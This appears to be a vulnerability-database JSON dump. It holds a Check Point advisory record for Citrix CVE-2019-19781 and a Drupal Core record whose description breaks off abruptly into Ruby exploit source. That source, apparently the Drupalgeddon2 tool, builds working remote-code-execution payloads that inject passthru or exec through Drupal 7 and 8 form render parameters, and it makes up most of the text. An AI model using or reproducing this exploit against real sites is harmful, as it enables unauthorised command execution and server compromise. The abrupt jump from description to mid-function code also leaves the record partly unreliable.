Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "checkpoint_advisories", "title": "Citrix Multiple Products Directory Traversal (CVE-2019-19781)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-26T00:00:00", "id": "CPAI-2019-1653", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:02", "description": "A code execution vulnerability exists in Drupal Core. 
Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)\n request.initialize_http_header({\"User-Agent\" => $useragent})\n request.initialize_http_header(\"Cookie\" => cookie) if not cookie.empty?\n request.body = payload if not payload.empty?\n return $http.request(request)\n rescue SocketError\n puts error(\"Network connectivity issue\")\n rescue Errno::ECONNREFUSED => e\n puts error(\"The target is down ~ #{e.message}\")\n puts error(\"Maybe try disabling the proxy (#{$proxy_addr}:#{$proxy_port})...\") if $proxy_addr\n rescue Timeout::Error => e\n puts error(\"The target timed out ~ #{e.message}\")\n end\n\n # If we got here, something went wrong.\n exit\nend\n\n\n# Function gen_evil_url <cmd> [method] [shell] [phpfunction]\ndef gen_evil_url(evil, element=\"\", shell=false, phpfunction=\"passthru\")\n puts info(\"Payload: #{evil}\") if not shell\n puts verbose(\"Element : #{element}\") if not shell and not element.empty? and $verbose\n puts verbose(\"PHP fn : #{phpfunction}\") if not shell and $verbose\n\n # Vulnerable parameters: #access_callback / #lazy_builder / #pre_render / #post_render\n # Check the version to match the payload\n if $drupalverion.start_with?(\"8\") and element == \"mail\"\n # Method #1 - Drupal v8.x: mail, #post_render - HTTP 200\n url = $target + $clean_url + $form + \"?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=\" + phpfunction + \"&mail[a][#type]=markup&mail[a][#markup]=\" + evil\n\n elsif $drupalverion.start_with?(\"8\") and element == \"timezone\"\n # Method #2 - Drupal v8.x: timezone, #lazy_builder - HTTP 500 if phpfunction=exec // HTTP 200 if phpfunction=passthru\n url = $target + $clean_url + $form + \"?element_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax\"\n payload = \"form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=\" + phpfunction + 
\"&timezone[a][#lazy_builder][][]=\" + evil\n\n #puts warning(\"WARNING: May benefit to use a PHP web shell\") if not try_phpshell and phpfunction != \"passthru\"\n\n elsif $drupalverion.start_with?(\"7\") and element == \"name\"\n # Method #3 - Drupal v7.x: name, #post_render - HTTP 200\n url = $target + \"#{$clean_url}#{$form}&name[%23post_render][]=\" + phpfunction + \"&name[%23type]=markup&name[%23markup]=\" + evil\n payload = \"form_id=user_pass&_triggering_element_name=name\"\n end\n\n # Drupal v7.x needs an extra value from a form\n if $drupalverion.start_with?(\"7\")\n response = http_request(url, \"post\", payload, $session_cookie)\n\n form_name = \"form_build_id\"\n puts verbose(\"Form name : #{form_name}\") if $verbose\n\n form_value = response.body.match(/input type=\"hidden\" name=\"#{form_name}\" value=\"(.*)\"/).to_s.slice(/value=\"(.*)\"/, 1).to_s.strip\n puts warning(\"WARNING: Didn't detect #{form_name}\") if form_value.empty?\n puts verbose(\"Form value : #{form_value}\") if $verbose\n\n url = $target + \"#{$clean_url}file/ajax/name/%23value/\" + form_value\n payload = \"#{form_name}=#{form_value}\"\n end\n\n return url, payload\nend\n\n\n# Function clean_result <input>\ndef clean_result(input)\n #result = JSON.pretty_generate(JSON[response.body])\n #result = $drupalverion.start_with?(\"8\")? JSON.parse(clean)[0][\"data\"] : clean\n clean = input.to_s.strip\n\n # PHP function: passthru\n # For: <payload>[{\"command\":\"insert\",\"method\":\"replaceWith\",\"selector\":null,\"data\":\"\\u003Cspan class=\\u0022ajax-new-content\\u0022\\u003E\\u003C\\/span\\u003E\",\"settings\":null}]\n clean.slice!(/\\[{\"command\":\".*}\\]$/)\n\n # PHP function: exec\n # For: [{\"command\":\"insert\",\"method\